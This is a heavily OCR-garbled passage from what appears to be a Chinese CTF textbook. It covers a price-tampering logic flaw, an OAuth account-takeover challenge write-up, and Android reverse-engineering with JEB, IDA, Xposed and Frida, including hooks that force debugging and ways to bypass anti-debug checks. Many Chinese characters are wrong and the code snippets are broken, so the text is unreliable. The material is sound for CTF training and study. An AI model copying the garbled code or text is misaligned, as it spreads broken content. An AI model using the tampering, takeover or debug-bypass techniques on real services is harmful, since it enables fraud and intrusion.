seller 购 买 了 productid 商 品 ”。 当 交易 正常 完成 时 ，purchaser 的 余额 会 扣除 money 对 应 的 份额 ， 
但 是 当 服 务 闯 扣 费 仅 依据 URL 中 的 money 参 数 时 ， 攻 击 者 可 以 轻易 修改 money 参 数 来 改变 自己 的 实 
际 消费 金额 。 例 如 ， 和 修改 后 的 URL 为 http://demo.meizj.com/pay.php? money=1&purchaser 
=jack&productid=1001&seller=john。 此 时 ， 攻 击 者 仅 通过 1 元 便 完成 了 购买 流程 。 这 本 质 上 是 
因为 后 痛 对 于 数据 的 类 型 、 格 式 没有 进行 有 效 校 验 ， 导 致 了 意外 情况 的 产生 。 


所 以 ， 人 在 笔者 看 来 ， 数 气相 天 的 逻辑 漏洞 基本 均 为 对 数据 的 校 验 人 存在 钳 漏 所 导致 。 
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3.4.2 CTF 中 的 逻辑 凋 洞 


相 较 于 Web 安 全 的 其 他 漏洞 ， 逻 辑 漏洞 通 单 需要 多 个 业务 功能 漏洞 的 组 合 利 用 ， 因 此 往往 仓 企业 务 体 
系 复 杂 的 环境 中 ， 部 署 成 本 顺 大 ， 在 CTF 比 赛 中 出 现 的 频率 较 低 。 


2018 年 ，X-NUCA 中 有 一 章 名 为 “blog” 的 Web 题 目 ， 实 现 了 一 个 小 型 的 OAuth 2.0 认 证 系统 ， 选 
手 需 要 找 出 其 中 的 漏洞 ， 以 登录 管理 员 账 号 ， 并 企 登 录 后 的 后 侣 页面 获 得 flag。 


OAuth 2.0 是 一 个 行业 的 标准 授权 协议 ， 目 的 是 为 第 三 万 应 用 和 绒 友 具 有 时 效 性 的 Token， 使 得 第 三 万 
应 用 可 以 通过 Token 获 取 相关 资源 。 常 见 的 场景 为 需要 登录 某 网 站 时 ， 用 尸 未 拥有 该 网 站 账号 ， 但 该 
网 站 接 入 了 QQ、 微 信 等 快捷 登录 接口 ， 用 户 在 进行 快捷 登录 时 使 用 的 便 是 OAuth 2.0。 


OAuth 2.0 的 认证 流程 见 图 3-4-9， 具 体 为 : 客 尸 端 页 面向 用 户 请 求 授 权 许 可 一 客户 端 页 面 获 得 用 户 
授权 许可 一 客户 首页 面向 授权 服务 器 (如 微 信 ) 请 求 友 放 Token 忆 授权 服务 器 确认 授权 有 效 ， 奴 用 - 
oke 
全 客户 疹 页 面 一 客户 站 页 面 携 市 Token 请 求 资 源 服 务 器 一 次 源 服 务 器 验证 Token 有 效 后 ， 返 回 贷 
i 


Nn 


这 个 题目 中 存在 以 下 功能 : 普通 用 尸 的 注册 登录 功能 OAuth 网 站 的 用 尸 注册 登录 功能 ;将 普通 用 户 
与 OAuth 网 站 账号 绑 定 ; 友 送 一 个 链接 至 管理 员 ， 管 理 员 目 动 访问 ， 链 接 必 须 为 题目 网 址 开头 ; 任意 
地 址 跳 转 漏洞 。 


在 进行 普通 用 户 与 OAuth 的 账号 绑 定 时 ， 先 返回 一 个 Token， 随 后 页 面 携带 Token 进 行 跳 转 ， 成 下 
U 
账号 与 普通 用 户 的 绑 定 。 扒 市 Token 进 行 账 号 绑 定 的 链接 形式 为 : http://oauth.demo.com/ 
main/oauth/? state=***xx*x*。 访 问 链接 后 ， 将 自动 完成 OAuth 账 号 与 普通 账号 的 绑 定 。 


图 3-4-9 
此 时 攻击 点 出 现 了 ， 关 键 在 于 普通 用 户 访问 携带 了 Token 的 链接 便 能 完成 普通 账号 与 OAuth 账 号 的 绑 
定 ; 同 理 ， 管 理 员 访问 该 链接 同样 可 以 完成 账号 的 绑 定 。 此 处 可 以 利用 任意 地 址 跳 转 漏洞 ， 在 远程 服 
务 器 上 部 署 一 个 地 址 跳 转 的 页 面 ， 跳 转 地 址 便 是 携 审 Token 进 行 绑 定 的 链接 。 当 管理 员 访 问 提 区 的 链 
接 时 ， 先 被 重 定向 至 远程 服务 器 ， 继 续 被 重 定向 至 绑 定 页 面 ， 从 而 完成 OAuth 账 号 与 管理 员 账 号 的 绑 
定 。 全 此 ， 使 用 OAuth 账 号 快捷 登录 ， 便 可 登录 管理 员 账 号 。 


3.4.3 逻辑 漏洞 小 结 
相 较 于 前 面 提 到 的 各 种 Web 漏 洞 ， 软 辑 漏 洞 没有 一 种 国定 的 格式 来 皇 现 。 要 进行 逻辑 漏洞 的 挖 据 ， 需 
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要 参赛 者 对 业务 流程 做 到 心中 有 数 。 现 实 环境 下 的 逻辑 漏洞 挖 据 还 需要 考虑 多 种 认证 方式 及 不 同 的 业 
务 线 ， 这 里 不 再 讨论 ， 读 者 可 以 在 日 单 工作 生活 中 友 现 其 中 的 乐趣 。 
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小 结 


一 般 来 说，Web 题 目 在 整个 CTF 比 者 中 所 有 方向 中 入 门 最 简单 。 本 书 将 Web 题 目 涉 及 的 主要 漏洞 分 为 

入门 ”“ 进 阶 ” “招展 ”三 个 展 炊 ， 各 为 一 章 ， 让 读者 逐步 深入 。 但 因为 Web 漏 洞 的 分 类 十 分 复杂 
葵 多 ， 同 时 扩 术 更 新 相 较 于 其 他 类 型 题目 也 更 快 ， 希望 读者 在 阅读 本 书 的 同时 补充 相关 知识 ， 这 样 才 
能 举一反三 ， 让 目 身 能 力 有 更 好 的 提升 。 


对 于 本 书 的 相关 内 容 ， 读 者 可 以 在 N1BOOK (https://book.nu1l.com/) 平台 上 找到 相应 的 配套 例 
题 进行 练习 ， 从 而 更 好 地 理解 本 书 内 容 。 
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第 4 草 APK 


CTF 中 的 移动 器 题目 普 志 俩 少 ，Android 类 的 题目 主要 仿 器 杂 项 (Misc) 和 逆向 (Reverse) 。 前 者 
通 弟 根据 Android 系 统 特性 隐藏 相关 数据 ， 考 察 参 赛 者 对 系统 特性 的 熟悉 程度 ， 后 者 主要 考察 参赛 者 
SHEIK NA EO /Ge | PA DANN 、 加 固 、 反 调试 等 技术 ， 以 增加 应 用 
的 逆 回 难度 。 这 类 题目 往往 需要 参赛 者 具备 一 定 的 逆向 和 开 友 能 力 ， 玖 炙 音 用 调试 逆 癌 工具 ， 知 道 瘟 
见 反 调试 及 加 谢 脱 元 方法 。 


本 章 将 介绍 Android 开 友 的 基本 知识 ， 介 绍 移动 闯 CTF 解 题 所 需 的 必 备 技能 ， 以 及 弟 用 工具 的 使 用 技 
巧 和 反 调 试 原理 、 胶 元 原理 等 实战 技能 ， 最 后 通过 笋 例 让 读者 能 更 快 、 更 好 地 入 |CTF 移 动 凯 题目 。 
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4.1 Android 开 发 基础 


4.1.1 Android 四 大 组 件 


Android 应 用 程序 包括 以 下 4 个 核心 组 件 。 


@Activity: 面向 用 户 的 应 用 组 件 或 者 用 户 操作 的 可 视 化 界面 ， 基 于 Activity 基 类 ， 底层 由 ， 
CTIVI 9 
统一 管理 ， 也 负责 处 理应 用 内 或 应 用 间 发 送 的 Intent 消 息 . 


@Broadcast Receiver: 接受 并 过 滤 广播 消息 的 组 件 ， 应 用 想 显 示 的 接收 广播 消息 ， 需 在 Manifest 
清单 文件 中 注册 一 个 receiver， 用 Intent filter 过 滤 特 定 类 型 的 广播 消息 ， 见 图 4-1-1。 应 用 内 也 可 上 


通过 registerReceiver 在 运行 时 动态 注册 。 


roid:name="com,.qihoo366 .mobitesafe.pcdaemon, receiver,.DaemonBroadcastReceive 


e 
<action android:name="com,qihoo360.mobitesafe,NotifyDaemonStart” /> 
</intent-filter> 
<intent-filter> 
<action android:name="com.qihoo360.mobilesafe.NotifyDaemonStop" /> 
</intent-filter> 
</receiver> 


@Service: 通 划 用 于 处 理 后 台 耗 时 逻辑 。 用 户 不 直接 与 3ervice 对 应 的 应 用 进程 父 互 。 二 他 pu 
ndroi 
应 用 组 件 一 样 ，Service 也 可 以 通过 IPC 机 制 接收 和 发 送 Intent。 


使 用 Service 必 须 在 Manifest 清 单 文件 中 注册 ， 见 图 4-1-2。 Service 可 以 通过 Intent 进 行 局 动 、 停 止 和 


绑 定 。 


@Content Provider: 应 用 程序 间 数 据 共 享 的 组 件 。 如 ContactsProvider (联系 人 提供 者 ) 对 联系 
人 信息 统一 管理 ， 可 以 被 其 他 应 用 (申请 权限 之 后 ) 访问 ， 应 用 还 可 以 创建 自己 的 Content ene 

rovide 
， 并 且 把 上 自身 数据 暴露 给 其 他 应 用 。 


PrivacySpaceGuardService" android:process=":GuardService"> 


4.1.2 APK 文 件 结 构 


APK (Android application Package，Android 应 用 程序 包 ) 文件 通常 包含 以 下 文件 和 目录 。 


1. meta-inf 目 录 


meta-inf 目 录 包 括 如 下 文件 。 
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学 manifest.mf: 清单 文件 。 
多 Certrsa: 应 用 签名 文件 。 
入 certsf : 资源 列表 及 对 应 的 SHA-1 签 名 。 
p11 =: 
lib 目 录 包 括 平 台 相 关 的 库 文件 ， 可 能 包括 以 下 文件 。 
作 armeabi: 所 有 ARM 处 理 器 相关 文件 。 
今 armeabi-v7a: ARMV7 及 以 上 处 理 器 相关 文件 。 
科 arm64-v8a: 所 有 ARMv8 处 理 器 下 的 arm64 相 关 文 件 。 
入 X86: 所 有 X86 处 理 器 相关 文件 。 
八 X86_64: 所 有 x86 64 处 理 器 相关 文件 。 
们 mips: MIPS 处 理 器 相关 文件 。 
3. res 
res 文 件 是 没有 编译 至 resources.arsc 中 的 其 他 资源 文件 。 


4. assets 


assets 文 件 是 指 能 通过 AssetManager 访 问 到 的 资源 文件 。 


5. AndroidManifest.xml 


AndroidManifest.xml 是 Android 组 件 清单 文件 ， 包 含 应 用 名 字 、 上 版本、 权限 等 信息 ， 以 二 进 制 XML 
文件 格式 存储 在 APK 文 件 中 ， 能 通过 apktool、AXMLPrinter2 等 工具 转换 成 XML 明 文 格式 文件 。 


6. classes.dex 
classes.dex 是 Android 运 行 时 可 执行 文件 。 
1. resources.arsc 


resources.arsc 包 含 编译 好 的 部 分 资源 文件 。 
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4.1.3 DEX 文 件 格式 


DEX 是 Dalvik VM executes 的 简称 ， 即 Android Dalvik 可 执行 程序 。DEX 文 件 中 包含 该 可 执行 程序 的 
所 有 Java 层 代码 。DEX 经 过 压缩 和 优化 ， 不 仅 能 减 小 程序 大 小 ， 还 能 加 快 类 及 方法 的 得 找 效率 。DEX 
文件 结构 见 图 4-1-3。 


Stringldltem 
| StringDataOff 


ClassDateltem Ehcoded Method z 


nstanceFieldSize 


品 
由 


Header 
Stringlds 
Typelds 


Protolds 


Fieldlds 


S 
d 





Methodlds 


ClassDefs ClassDateOff HicFlel Methodldltem 


= 
所 
各 
三 
中 
8 
由 


Classldx 
StaticValuesOff 


\ MapsList 


DEX 文 件 的 header 部 分 包 合 了 文件 大 小 、 校 验 值 、 各 数据 类 型 表 的 偏 移 和 大 小 等 数据 。 类 型 表 有 以 
类 型 。 


他 string 表 : 每 个 表 项 都 指向 一 个 string 数 据 偏 移 。string 数 据 由 两 部 分 组 成 ， 起 始 位 置 为 | 
U 
128 算 法 编码 的 变 长 string 长 度 ， 后 面 紧 跟 string 的 具体 数据 ， 由 \0 结尾 。 


二 


他 type 表 : 存储 各 type 在 string 表 中 的 索引 。 


多 proto 表 : 每 项 包含 3 个 元 素 ， 分 别 为 函数 原型 简写 、 返 回 类 型 索引 、 参 数 偏 移 ， 参 数 偏 移 
处 第 一 个 元 素 类 型 为 uint， 表 示 参 数 个 数 。 


入 field 表 : 每 个 表 项 用 3 个 元 素 摘 述 了 一 个 变量 ， 分 别 为 该 变量 所 属 的 类 、 该 变量 所 属 的 # 
型 、 该 变量 的 名 字 。 


入 method 表 : 每 个 表 项 用 3 个 元 素来 摘 述 一 个 函数 ， 分 别 为 该 函数 所 属 的 类 、 该 阔 数 的 函数 
原型 、 该 函数 的 名 字 。 


他 class 表 : 每 个 表 项 用 8 个 元 素来 摘 述 一 个 类 ， 分 别 为 类 名 、 类 属性 access :Te 3 
移 、 接 口 偏 移 、 源 文件 索引 、 类 注释 、 类 数据 偏 移 、 静 态 变 量 偏 移 。 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek4e73277021a4e732ced3b55 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


入 maps 表 : 保 仔 上 述 各 表 的 大 小 和 起 始 仿 移 ， 系 统 能 够 通过 该 表 快 速 定 位 到 各 表 。 


4.1.4 Android API 


截止 2019 年 5 月 ，Android 最 新 API 级 别 为 28， 对 应 版 本 为 Pie， 每 个 大 版 本 APl 都 有 较 大 的 变化 。 企 
.Xmi 清 单 文件 中 ， 我 们 可 以 看 到 该 应 用 最 低 支 持 的 API 版 本 及 编译 使 用 的 API 版 本 。 
官方 API 列 表 见 图 4-1-4。 


API 级 别 /NDK 版 本 


API 级 别 28 
Oreo 1 APl 级 别 27 
Oreo .0. API 级 别 26 
Nougat 7. API 级 别 25 
Nougat API 级 别 24 
Marshmallow API 级 别 23 
Lollipop API 级 别 22 
Lollipop API 级 别 21 
KitKat API 级 别 19 
Jelly Bean .3. API 级 别 18 


Jelly Bean ,2.x API 级 别 17 


4.1.5 Androld 示 例 代 码 


Android 编 程 语言 为 Java， 但 是 从 2017 年 5 月 的 Google MO 大 会 开始 ， AncrodE 方 语言 &K3 了 本 
otli 
(基于 JVM 的 编程 语言 ) ， 弥 补 了 Java 缺 失 的 现代 语言 特性 ， 简 化 了 代码 ， 使 得 开 友 者 可 以 编写 尺 


量 少 的 代码 。 本 章 仍 以 原始 Java 代 码 为 例 ， 展 示 Android 应 用 的 基本 代码 。 


Android 应 用 的 入 口 是 onCreate 国 数 : 


public class MainActivity extends ActionBarActivity { 
/** Called when the activity is first created. */ 
@Override 
public void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R. layout .activity_main); 
Log.i("CTF", "Hello world Android!"); 
} 
} 


AndoridManifest.xml 文 件 包括 该 应 用 的 入 口 、 权 限 、 可 接受 的 参数 。 


<?xml version="1.0" encoding="utf-8"?> 

<manifest xmlns:android="http://schemas.android.com/apk/res/android" 
package="com.ctf.test"> 
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> 
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<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/> 
<application 

android:allowBackup="true" 
android:icon="@mipmap/ic_launcher" 
android:1label="@string/app_name" 
android:supportsRtl="true" 
android:theme="@style/AppTheme"> 


<activity android:name=".MainActivity"> 
<intent-filter> 
<action android:name="android.intent.action.MAIN" /> 
<category android:name="android .intent.category.LAUNCHER" /> 
</intent-filter> 
</activity> 
</application> 
</manifest> 
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1 D 关 本 三 


本 节 主 要 介绍 在 APK 逆 向 时 主要 使 用 的 一 些 逆 向 工具 和 模块 ， 好 工具 能 大 大 加 快 逆向 的 速度 。 针对 
n 
平台 的 逆向 工具 有 很 多 ， 如 Apktool、JEB、IDA、AndroidKiller、Dex2Jar、JD-GUI、 
、baksmali、jadx 等 ， 本 节 主 要 介绍 JEB、1IDA、Xposed 和 Frida。 


smal 


4.2.1 JEB 


针对 Android 平 台 有 许多 反 编 译 器 ， 其 中 JEB 的 功能 最 强大 。JEB 从 早期 的 Android APK 反 编译 器 发 展 
到 现在 ， 不 仪 支持 Android APK 文 件 反 编译 ， 还 支持 MIPS、ARM、ARM64、x86、x86-64、 
、EVM 等 反 编 译 ， 展 示 页 面 和 开放 接口 易 用 ， 大 大 降低 了 逆向 工程 的 难度 ， 见 图 4-2-1。 


ebA 


JEB3 Beta = easyeasy 0 Hsbhihg? TS. mpk 
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else { 
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] : Only relocstable ARM files are supperted for relocwtilons 
: Only relocatable ARM files re supported for relocwtions 
: Cnly relocatable ARM files are supperted For relocations 
: rly relocstable ARN files are supperted for relocatlons 
: nly relocwtable MRM files are supparted tor relocwtions 
: Only relocatable ARN files Bre supported For relocmtions 
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图 4-2-1 
JEB 2.0 后 增加 了 动态 调试 功能 ， 动 态 调试 功能 简单 易 用 ， 容 易 上 手 ， 可 以 凋 试 任意 开局 凋 试 模式 的 、 


附加 调试 时 ， 进 程 标记 为 D， 表 示 该 进程 可 以 被 调试 ， 否 则 说 明 该 进程 没有 打开 调试 开关 ， 无 法 调 
试 ， 见 图 4-2-2。 


机 器 / 设备 


Q 


Index| 名 | 地 址 | 标示 | 信息 | 
0 FA6970302863 Online 
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进程 


Q Bytecodelcom.example.ring.myapplication 


Index| ID | 名 | 标示 | 


Remote Debugging 


Debug a remote target 
主机 名 : 
接口 : 


Options 
暂停 所 有 进程 
Allow children debuggers (for Android apps, provide Native debugging) 


附 上 关闭 Refresh Machines List 


图 4-2-2 








打开 调试 功能 后 ，OSX 系 统 通 过 Command+B 在 smali 层 面 上 布置 断 点 ， 右 侧 VM/ 局 部 变量 窗口 下 查 
看 当前 位 置 各 寄存 器 的 值 ， 双 击 能 修改 任意 寄存 器 值 ， 见 图 4-2-3。 


JEB3 Bota - /Users/burningcodes/pwnfrdcti/easy 100.c56a74709b39c apk [DEBUGGING] 








没有 开启 调试 功能 的 应 用 、 非 Eng 版 本 的 Android 手 机 被 root 后 ， 可 能 出 现 无 法 调试 其 他 应 用 的 情 
况 ， 这 时 可 以 通过 Hook 系 统 接口 强制 开启 调试 模式 来 进行 ， 如 通过 Xposed Hook 实 现 非 Eng 手 机 下 
的 JEB 动 态 调试 。Hook 动 态 修 改 debug 状 态 的 代码 如 下 : 


Class 


pms=SharedObject .masterClassLoader.loadClass("com.android.server.pm.PackageManagerService"); 


XposedBridge.hookALLMethods[pms "getPackageInfo" nen XC_MethodHook() { 
protected void afterHookedMethod(MethodHookParam param) throws Throwable { 
int x = 32768: 
Object v2 = param.getResultt(); 
if(v2 != null) { 
ApplicationInfo applicationInfo = ((PackageInfo)v2).applicationInfo; 
int flag = applicationInfo.flags; 
if((flag&x) == 8) { 
flag |= x: 
} 
if((flag&2) == 0 
flag |= 2; 
} 
applicationInfo.flags = flag; 
param. setResult(v2); 


强制 将 PackageManagerService 的 getPackagelnfo 函 数 中 应 用 程序 调试 Flag 改 为 调试 状态 ， 即 可 强 
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制 打开 调试 模式 ， 在 任意 root 设 备 中 完成 动态 调试 。 
4.2.2 IDA 


在 遇 到 Native (本 地 服务 ) 逆向 时 ，1DA 优 于 JEB 等 其 他 逆向 工具 ， 其 动态 调试 能 大 大 加 速 Android 
层 逆向 速度 ， 本 节 主 要 介绍 如 何 使 用 IDA 进 行 Android so Native 层 逆向 。 


IDA 进 行 Android Native 层 调试 需要 用 到 IDA 目 市 工具 android server: 对 于 32 位 Android 手 机 ， 使 
用 32 位 版 android server 和 32 位 版 IDA; 对 于 64 位 Android 手 机 ， 使 用 64 位 版 android server 和 64 
位 版 IDA， 将 android server 存 至 手机 目录 ， 且 修改 权限 ， 见 图 4-2-4。 


图 4-2-4 
IDA 调 试 默认 监听 23946 端 口 ， 和 需要 使 用 adb forward 指 今 将 Android 端 口 命令 转发 至 本 机 ,: 


打开 IDA 远 程 ARM/Android 调 试 跨 ， 见 图 4-2-5。 


Hostname 选 择 默 认 的 127.0.0.1 或 本 机 1IP 地 址 ，Port 选 择 默认 的 23946， 见 图 4-2-6。 再 选择 需要 调 
试 的 应 用 ， 见 图 4-2-7。 
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NOTE: all paths must be valid on the remote computer 


Debug options 


Hostname 127.0.0.1| 避 Port 


Password 


Save network settings as default 


Help Cancel 


图 4-2-6 
进入 IDA 主 页 面 后 选择 modules， 找 到 该 进程 对 应 的 native 层 so， 见 图 4-2-8。 


双击 进入 该 so 对 应 的 导出 表 ， 找 到 需要 调试 的 Native 函 数 ( 见 图 4-2-9) ， 然 后 双击 进入 函数 页 面 ， 
人 在 主页 面 下 断 点 、 观 察 寄存 器 变化 ( 见 图 4-2-10) 。 


某 些 Native 函 数 (JNI OnLoad、init array) 在 so 加 载 时 会 默认 自动 执行 ， 对 于 这 类 函数 无 法 直接 使 
用 上 述 方式 进行 调试 ， 需 要 在 动态 库 加 载 前 断 下 ， 所 有 动态 库 都 是 通过 linker 加 载 ， 所 以 需要 定位 到 


中 加 载 so 的 起 始 位 置 ， 然 后 在 linker 初 始 化 该 so 时 进入 。 


4.2.3 Xposed Hook 


Xposed 是 一 款 在 root 设 备 下 可 以 在 不 修改 源码 的 情况 下 影响 程序 运行 的 Android Hook 框 架 ， 其 原理 
是 将 手机 的 孵化 器 zygote 进 程 蔡 换 为 Xposed 自 市 的 zygote， 使 其 在 局 动 过程 中 加 载 XposedBridge. 

， 模 块 开 发 者 可 以 通过 JAR 提 供 的 APl 来 实现 对 所 有 Function 的 劫持 ， 在 原 Function 执 行 的 前 后 加 
上 自 定义 代码 。Xposed Hook 的 步骤 如 下 。 


<1> 在 AndroidManifest.xml 中 的 application 标 签 内 添加 Xposed 相 关 的 meta-data: 


Choose process to attach to 
ID Name 
26131 [64] com.android.defcontainer 
26163 [64] com.android.gallery3d 
26200 [32] com.alipay.iot.launcher 
26220 [32] com.sohu.inputmethod.sogou:classic 
26247 [32] com.umetrip.android.msky.app:pushservice 
26310 [32] com.eg.android.AlipayGphone:tools 
26398 [64] com.android.packageinstaller 
26434 [32] com.android.keychain 
26534 [64] com.example.ring.wantashell 
26570 [32] com.tencent.mobileqq:MSF 
26588 [32] com.tencent.mobileqq 
3013 [32] com.alipay.auto.testall:channel 
3080 [32] com.youku.phone:channel 
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3409 [32] com.eg.android.AlipayGphone:push 
4036 [32] /data/app/com.youku.phone-m8n-VVTma1hAqdrrbn515w==/lib/... 
4368 [32] com.youku.phone:phone_monitor 
4507 [32] com.alibaba.android.security.activity 
464 [64] /vendor/bin/qseecomd 
479 [64] /vendor/bin/qseecomd 
499 [64] /vendor/bin/hw/android.hardware.graphics.composer@2.1-service 
5144 [64] com.alipay.iot.master:worker 
5150 [32] com.hupan.app 
5223 [64] com.alipay.iot.master:monitor 
5394 [32] com.hupan.app:TcmsService 
5485 [32] com.hupan.app:channel 


x 
Help Search Cancel I ok | 


Line 35 of 62 


图 4-2-7 


exarmDle.rina.Wantash FmtwrffuwwIOW6InwQ 2Z00 b/arm64/libeasyeasy 
图 /data/app/com.virjar.xposedhooktool-YRbiXnaj7qjR2n6n54BR2Q==/oat/arm64/base.odex 
图 /data/app/com.example.ring.wantashell-FmtwrffuQwioW6jnwQ_zoQ==/oat/arm64/base.odex 
图 /data/dalvik-cache/oat/arm64/xposed_XTypedArraySuperClass.odex 

图 /data/dalvik-cache/oat/arm64/xposed_XResourcesSuperClass.odex 

图 /data/dalvik-cache/arm64/system@framework@XposedBridge.jar@classes.dex 


@ 国 Modules 


_Z7encryptPKcj 78FCCD6DF0 


JaVa ( Mt KFaSSWO 


个 Java_com_example_ring_wantashell_Check_checkEmulator 78FCCD74A4 
个 _Z14searchDexStartPKv 78FCCD74E0 
_ZN10_cxxabiv111_terminateEPFvvE 78FCCD926C 
个 _ZN10_cxxabiv112_unexpectedEPFvvE 78FCCD92E4 
_ZN10_cxxabiv115_forced_unwindD2Ev 78FCCDE724 
_ZN10_cxxabiv115_forced_unwindD1Ev 78FCCDE724 
_ZN10_cxxabiv115_forced_unwindD0OEv 78FCCDE728 
_ZN10_cxxabiv119_foreign_exceptionD2Ev 78FCCDE74C 
_ZN10_cxxabiv119_foreign_exceptionD1Ev 78FCCDE74C 


Nibeasyeasy.so:00000078FCCD724C 
libeasyeasy.so:00000078FCCD724C Java_com example ring wantashell Check_ checkPasswd 
libeasyeasy.so:00000078FCCD724C 
libeasyeasy.so:00000078FCCD724C var 58= -0x58 

‘libeasyeasy.so:00000078FCCD724C var 50= -0x50 
libeasyeasy.so:00000078FCCD724C var 48= -0x48 
libeasyeasy.so:00000078FCCD724C var 40= -0x40 
libeasyeasy.so:00000078FCCD724C var 38= -0x38 
libeasyeasy.so:00000078FCCD724C var_30= -0x30 
*1ibeasyeasy.s0:00000078FCCD724C var 20= -0x20 
libeasyeasy.so:00000078FCCD724C var 10= -0x10 
libeasyeasy.so:00000078FCCD724C var s0= 0 
libeasyeasy.so:00000078FCCD724C 000000 

” Libeasyeasy. 0100000078FCCDT24C | Ky247 X237 [SP F200 00 Oo)! tt 
* libeasyeasy.so:00000078FCCD7250 STP X22, X21, [SP,#0x30+var 20] x1400023EA0B1000000 


FFFFFFFFFFFFFFFC 
0000007FC018ERA68 
0000000000000010 
00000000000001DF 
0000000000000000 
0000000000000008 
000000007258298C 
0000000000000000 
0000000000000016 


圈 随 上 籽 风 | 
痊 基 当 闪 闪闪 闪闪 关 疼 


图 4-2-10 


android:name="xposeddescription" 
android:VvaLue=" 这 里 填写 xposed 说 明 " /> 
<meta-data 
android:name="xposedminversion" 
android:value="54" /> 


其 中 ，xposedmodule 表 示 这 是 一 个 Xposed 模 块 ，xposeddescription 描 述 该 模块 的 用 途 ， 可 以 引 
用 string.xml 中 的 字符 串 ，xposedminversion 是 要 求 文 持 的 Xposed Framework 最 低 版 本 。 


<2> 导 入 XposedBridgeApi jar 包 。 在 Android studio 中 修改 app/build.gradle， 添 加 如 下 内 容 : 


dependencies { 


provided files('lib/XposedBridgeApi-54.jar') 


sync 后 ， 即 可 完成 导入 。 


<3> 编 写 Hook 代 三 : 


package com.test .ctf 

import de.robv.android.xposed.IXposedHookLoadPackage; 

import de.robv.android.xposed.XposedBridge; 

import de.robv.android.xposed.caLLbacks .XC_LoadPackage.LoadPackageParam; 
import android .utiL.Logi; 


public class CTFDemo implements IXposedHookLoadPackage { 
public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable { 
XposedBridge.log("Loaded app: " + lpparam.packageName); 
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Log .dC"YOUR_TAG" ， "Loaded app: W 十 Lpparam.packageName ) 


} 


<4> 声 明 Xposed 入 口 。 新 建 assets 文 件 夹 ， 并 创建 xposed init 文 件 ， 从 中 填写 Xposed 模 块 入 口 类 
名 ， 如 上 述 代码 对 应 的 类 名 为 com.test.ctf.CTFDemo。 


<5> 油 活 Xposed 模 块 。 在 Xposed 应 用 中 激活 模块 并 且 重 局 ， 即 可 观察 Hook 后 的 


pe :nlele]< 


Frida 是 一 蒜 跨 平台 的 Hook 杠 架 ， 支 持 iIOS、Android。 对 于 Android 应 用 ，Frida 不 仪 能 Hook Java 
层 国 数 ， 还 能 Hook Native 函 数 ， 能 大 大 提高 闻 向 分 析 的 速度 。Frida 的 安 六 过 程 见 官 方 文档 ， 不 再 帝 
述 ， 下 面 主要 介绍 Frida 使 用 的 技巧 。 


Oslolol ANileltello NE LMI ES 


Interceptor.attach(Module.findExportByName("libc.so" , "open"), { 
onEnter: function(args) { 
send("open("+Memory .readCString(args[96])+", "+args[1]+")"); 


onLeave:function(retval){ 


Java.perform(function () { 
var LogtooL = Java.use("com.tencent.mm.sdk.platformtools.y"); 
logtool .i.overload('java.lang.String', 'java.lang.String', '[Ljava.lang.Object;']. 
implementation = function(a, b, c){ 
console.log("hook 10g-->"+a+b); 


Q@ 通 过 | END 


console.log(Activity.$classWrapper.__fields__.map(function(field) { 
return Java.cast(field, Field) 
2 


ONEnM EW le ll Ne 


var env = Java.vm.getEnv(); 
var arr = env.getByteArrayElements(args[2],9); 
var len = env.getArrayLength(args[2]); 


OENEJESNIVE NDI Ede 


var build = Java.use("android.os.Build"); 
console.log(tag + build.PRODUCT.value); 


获取 Native 特 定 地 址 : 


var fctToHookPtr = Module.findBaseAddress("libnative-lib.so").add(Qx5A8); 
var fungetInt = new NativeFunction(fctToHookPtr.or(1), ‘int', ['int']); 
console.log("invoke 99 > " + fungetInt(99) ); 


Q 狭 取 app context: 


var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication(); 
var context = currentApplication.getApplicationContext(); 


Frida 需 要 在 root 环 境 下 使 用 ， 但 是 提供 了 一 种 不 需 root 环 境 的 代码 注入 方式 ， 通 过 反 编 译 ， 在 被 测 应 
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用 中 注入 代码 ， 使 其 在 初始 化 时 加 载 Frida Gadget 相 天 so， 并 且 在 lib 目 录 下 存放 配置 文件 libgadget. 
config.sSo， 说 明 动态 注入 的 JS 代码 路 径 。 重 打包 应 用 后 ， 即 可 实现 不 需 root 的 Frida Hook 功 能 。 
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4.3 APK 逆 同 之 反 调 试 


为 了 保护 应 用 关键 代码 ， 开 发 者 需要 采用 各 种 方式 增加 关键 代码 逆向 难度 。 调 试 技术 是 逆向 人 员 理 外 
关键 代码 逻辑 的 重要 手段 ， 对 应 的 反 调 试 技 术 则 是 应 用 开发 者 的 “铠甲 ”。Android 下 的 反 调 试 技术 
大 多 从 Windows 平 台 衍 生 而 来 ， 可 以 分 为 以 下 几 类 。 


1. 检测 调试 器 特征 
检测 调试 器 端口 ， 如 IDA 调 试 默认 占用 的 23946 端 口 。 
% 检测 党 用 调试 器 进程 名 ， 如 android server、gdbserver 等 。 
学 检测 /proc/pid/status、/proc/pid/task/pid/status 下 的 Tracepid 是 否 为 0。 


学 检测 /proc/pid/stat、/proc/pid/task/pid/stat 的 第 2 个 字段 是 否 为 t。 


令 检测 /proc/pid/wchan、/proc/pid/task/pid/wchan 是 否 为 ptrace stop。 


2. 检测 进程 自身 运行 状态 
井 程 是 否 为 zygote。 
作 利用 系统 自 带 检测 函数 android.os.Debug.isDebuggerConnected。 
三 三 Is 
科 检测 目 身 代 码 中 是 人 否 包含 软件 断 氮 。 
多 主动 龙 出 异常 信号 并 捕获 ， 如 果 没 有 被 正常 接收 说 明 被 调试 器 捕获 。 
池 检测 某 段 程序 代码 运行 时 间 是 否 超出 预期 。 


攻击 者 绕 过 上 述 各 类 检测 方式 最 便捷 的 方式 是 定制 Android ROOM， 从 Android 源 码 层面 隐藏 调试 器 
特征 。 比 如 ， 通 过 ptrace 阔 数 检 测 是 人 否 和 被 ptrace 时 ， 可 以 修改 源码 ， 让 ptrace 函 数 永 远 返回 非 调 试 状 
人 态 ， 即 可 绕 过 ptrace 检 测 ; 对 系统 目 市 的 IsDebuggerConnected 国 数 ， 也 可 以 通过 修改 源码 绕 过 
总 之 ， 熟 悉 Android 源 码 ， 准 备 一 套 专 门 针对 反 调 试 定 制 的 系统 ， 能 大 大 加 速 逆 向 进程 。 
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4.4 APK 和 这 癌 之 脱 元 


